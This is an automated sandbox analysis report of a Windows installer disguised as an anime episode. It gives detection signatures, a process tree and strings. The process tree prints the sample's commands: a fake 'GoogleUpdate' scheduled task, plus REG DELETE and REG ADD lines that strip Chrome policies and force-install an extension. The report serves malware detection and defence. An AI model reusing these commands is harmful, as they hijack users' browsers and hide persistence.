Windows Analysis Report
Boku no Hero Academia 6th Season - Episode 13.exe

Overview

General Information

Sample Name: Boku no Hero Academia 6th Season - Episode 13.exe
Analysis ID: 776910
MD5: 71eabe2172181c2e4517c30c22cb6d12
SHA1: caaa052ae05d6032d8361e61fa22a686c6b5a392
SHA256: 147e1b5a750fbfd8863449d523e3d6d110defceb74ad9cdb7c939ab75ffa2180

Detection

Score: 26
Range: 0 - 100
Whitelisted: false
Confidence: 0%

Compliance

Score: 36
Range: 0 - 100

Signatures

Uses cmd line tools excessively to alter registry or file data
Obfuscated command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Creates processes with suspicious names
Found dropped PE file which has not been started or loaded
Uses the system / local time for branch decision (may execute only at specific dates)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Is looking for software installed on the system
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Uses reg.exe to modify the Windows registry
Checks for available system drives (often done to infect USB drives)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample is looking for USB drives. Launch the sample with the USB Fake Disk cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample searches for specific file, try point organization specific fake files to the analysis machine
  • System is w10x64
  • Boku no Hero Academia 6th Season - Episode 13.exe (PID: 5216 cmdline: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe MD5: 71EABE2172181C2E4517C30C22CB6D12)
    • Boku no Hero Academia 6th Season - Episode 13.tmp (PID: 5512 cmdline: "C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$30408,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" MD5: F16A37D7AF3DB8C75F19AF9B3453D9C8)
      • Boku no Hero Academia 6th Season - Episode 13.exe (PID: 5204 cmdline: "C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENT MD5: 71EABE2172181C2E4517C30C22CB6D12)
        • Boku no Hero Academia 6th Season - Episode 13.tmp (PID: 2632 cmdline: "C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp" /SL5="$2040C,24635135,780800,C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENT MD5: F16A37D7AF3DB8C75F19AF9B3453D9C8)
          • VC_redist.x64.exe (PID: 1972 cmdline: "C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe" /install /quiet MD5: 703BD677778F2A1BA1EB4338BAC3B868)
            • VC_redist.x64.exe (PID: 5372 cmdline: "C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=628 /install /quiet MD5: 848DA6B57CB8ACC151A8D64D15BA383D)
              • VC_redist.x64.exe (PID: 5468 cmdline: "C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{E9871BE9-995B-4EFF-BA27-126D1FC36700} {ED4F63C9-39F6-4A7D-A76D-4B8F059F42ED} 5372 MD5: 848DA6B57CB8ACC151A8D64D15BA383D)
                • VC_redist.x64.exe (PID: 5280 cmdline: "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468 MD5: CAA6E1DCAE648CE17BC57A5B7D383CC8)
                  • VC_redist.x64.exe (PID: 2140 cmdline: "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=564 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468 MD5: CAA6E1DCAE648CE17BC57A5B7D383CC8)
                    • VC_redist.x64.exe (PID: 4548 cmdline: "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{DC57C196-DCD2-4148-818F-F83AAF0E5C46} {63FE371D-956D-4D2B-988F-00929D1EE668} 2140 MD5: CAA6E1DCAE648CE17BC57A5B7D383CC8)
          • InstallExtension.exe (PID: 1580 cmdline: "C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe" install MD5: 6B435C6EA00DA06603EA9927D489AB6A)
            • cmd.exe (PID: 5816 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • schtasks.exe (PID: 5912 cmdline: schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • cmd.exe (PID: 5928 cmdline: C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\WindowsApp\reg.bat" install MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 5872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • schtasks.exe (PID: 6036 cmdline: schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • msiexec.exe (PID: 1092 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
  • VC_redist.x64.exe (PID: 1272 cmdline: "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" /burn.runonce MD5: 848DA6B57CB8ACC151A8D64D15BA383D)
    • VC_redist.x64.exe (PID: 4668 cmdline: "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" /quiet /burn.log.append "C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log" /install MD5: 848DA6B57CB8ACC151A8D64D15BA383D)
      • VC_redist.x64.exe (PID: 3732 cmdline: "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=564 /quiet /burn.log.append "C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log" /install MD5: 848DA6B57CB8ACC151A8D64D15BA383D)
        • VC_redist.x64.exe (PID: 1324 cmdline: "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{9F679354-B01C-4132-8C3B-9D0B8BAD9686} {7ADE5D70-631D-453D-B602-70E5C1B36EAF} 3732 MD5: 848DA6B57CB8ACC151A8D64D15BA383D)
          • VC_redist.x64.exe (PID: 4544 cmdline: "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324 MD5: CAA6E1DCAE648CE17BC57A5B7D383CC8)
            • VC_redist.x64.exe (PID: 4008 cmdline: "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324 MD5: CAA6E1DCAE648CE17BC57A5B7D383CC8)
  • InstallExtension.exe (PID: 5852 cmdline: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe MD5: 6B435C6EA00DA06603EA9927D489AB6A)
    • cmd.exe (PID: 6092 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 5392 cmdline: REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 4396 cmdline: REG DELETE HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 5428 cmdline: REG DELETE HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 5416 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d dbffglanhdhedkjkijpkplhpcdndpchj /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 2040 cmdline: REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\WindowsApp\apps-helper\apps.crx" /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • reg.exe (PID: 4528 cmdline: REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "version" /t REG_SZ /d 1.0 /f MD5: E3DACF0B31841FA02064B4457D44B357)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe Code function: 4_2_00029EB7 DecryptFileW,4_2_00029EB7
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe Code function: 4_2_0004F961 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,4_2_0004F961
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe Code function: 4_2_00029C99 DecryptFileW,DecryptFileW,4_2_00029C99
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe Code function: 5_2_000C9EB7 DecryptFileW,5_2_000C9EB7
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe Code function: 5_2_000EF961 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,5_2_000EF961
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe Code function: 5_2_000C9C99 DecryptFileW,DecryptFileW,5_2_000C9C99
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe DLL: edputil.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe DLL: PROPSYS.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe DLL: SspiCli.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe DLL: MSVCP140.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe DLL: iertutil.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe DLL: VCRUNTIME140_1.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe DLL: urlmon.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe DLL: CRYPTBASE.DLL
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe DLL: CLDAPI.dll
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe DLL: VCRUNTIME140.dll

Compliance

Source: Boku no Hero Academia 6th Season - Episode 13.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore SRInitDone
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore SRInitDone
Source: C:\Windows\System32\msiexec.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF4C347D-954E-4543-88D2-EC17F07F466F}
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp Directory created: C:\Program Files\Installer
Source: Boku no Hero Academia 6th Season - Episode 13.exe Static PE information: certificate valid
Source: Boku no Hero Academia 6th Season - Episode 13.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: VC_redist.x64.exe, 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp, VC_redist.x64.exe, 00000004.00000000.270201080.000000000005B000.00000002.00000001.01000000.00000008.sdmp, VC_redist.x64.exe, 00000005.00000000.271727251.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp, VC_redist.x64.exe, 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp, VC_redist.x64.exe, 00000007.00000000.285438279.0000000000EBB000.00000002.00000001.01000000.0000000D.sdmp, VC_redist.x64.exe, 00000007.00000002.368408492.0000000000EBB000.00000002.00000001.01000000.0000000D.sdmp, VC_redist.x64.exe, 00000010.00000002.324092324.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000010.00000000.318798304.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000011.00000002.375653352.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000011.00000000.322751737.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000012.00000002.373692696.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000012.00000000.324242625.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000013.00000002.366393157.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 00000014.00000002.363516573.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 00000019.00000002.371119144.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000019.00000000.348409137.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 0000001B.00000002.368331825.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 0000001C.00000002.366244549.000000000005B000.00000002.00000001.01000000.00000013.sdmp, 
VC_redist.x64.exe, 0000001D.00000002.356595702.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe.5.dr, VC_redist.x64.exe.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: msvcp140.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFCM140U.amd64.pdb source: mfcm140u.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdbGCTL source: msvcp140.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcamp140.amd64.pdb source: vcamp140.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140DEU.amd64.pdb source: mfc140deu.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140ENU.amd64.pdb source: mfc140enu.dll.15.dr
Source: Binary string: C:\Users\dsaxc\Desktop\InstallExtension\x64\Release\InstallExtension.pdb source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.392947585.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, InstallExtension.exe, 0000001E.00000000.378319985.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 0000001E.00000002.382242447.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 00000022.00000000.382129606.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 00000022.00000002.387277253.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, is-NDGJF.tmp.3.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\concrt140.amd64.pdb source: concrt140.dll.15.dr
Source: Binary string: C:\Users\dsaxc\Desktop\InstallExtension\x64\Release\InstallExtension.pdb%% source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.392947585.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, InstallExtension.exe, 0000001E.00000000.378319985.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 0000001E.00000002.382242447.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 00000022.00000000.382129606.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, InstallExtension.exe, 00000022.00000002.387277253.00007FF6C2DF7000.00000002.00000001.01000000.00000015.sdmp, is-NDGJF.tmp.3.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_atomic_wait.amd64.pdbGCTL source: msvcp140_atomic_wait.dll.15.dr
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\WixStdBA.pdb source: wixstdba.dll.5.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_atomic_wait.amd64.pdb source: msvcp140_atomic_wait.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_2.amd64.pdb source: msvcp140_2.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\MFC140JPN.amd64.pdb source: mfc140jpn.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcamp140.amd64.pdbGCTL source: vcamp140.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140_2.amd64.pdbGCTL source: msvcp140_2.dll.15.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\concrt140.amd64.pdbGCTL source: concrt140.dll.15.dr
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\WixDepCA.pdb source: vcRuntimeAdditional_x64.5.dr, 3cd711.msi.15.dr
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00013BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,4_2_00013BC3
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00054315 FindFirstFileW,FindClose,4_2_00054315
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0002993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,4_2_0002993E
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00047A87 FindFirstFileExW,4_2_00047A87
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000F4315 FindFirstFileW,FindClose,5_2_000F4315
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000C993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,5_2_000C993E
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000B3BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,5_2_000B3BC3
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000E7A87 FindFirstFileExW,5_2_000E7A87
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\NULL
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\NULL
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\NULL
Source: VC_redist.x64.exeString found in binary or memory: http://appsyndication.org/2006/appsyn
Source: VC_redist.x64.exe, 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp, VC_redist.x64.exe, 00000004.00000000.270201080.000000000005B000.00000002.00000001.01000000.00000008.sdmp, VC_redist.x64.exe, 00000005.00000000.271727251.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp, VC_redist.x64.exe, 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp, VC_redist.x64.exe, 00000007.00000000.285438279.0000000000EBB000.00000002.00000001.01000000.0000000D.sdmp, VC_redist.x64.exe, 00000007.00000002.368408492.0000000000EBB000.00000002.00000001.01000000.0000000D.sdmp, VC_redist.x64.exe, 00000010.00000002.324092324.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000010.00000000.318798304.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000011.00000002.375653352.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000011.00000000.322751737.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000012.00000002.373692696.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000012.00000000.324242625.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000013.00000002.366393157.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 00000014.00000002.363516573.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 00000019.00000002.371119144.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 00000019.00000000.348409137.0000000000C6B000.00000002.00000001.01000000.00000010.sdmp, VC_redist.x64.exe, 0000001B.00000002.368331825.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 0000001C.00000002.366244549.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe, 0000001D.00000002.356595702.000000000005B000.00000002.00000001.01000000.00000013.sdmp, VC_redist.x64.exe.5.dr, VC_redist.x64.exe.7.drString found in binary or memory: http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.408510272.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-NDGJF.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
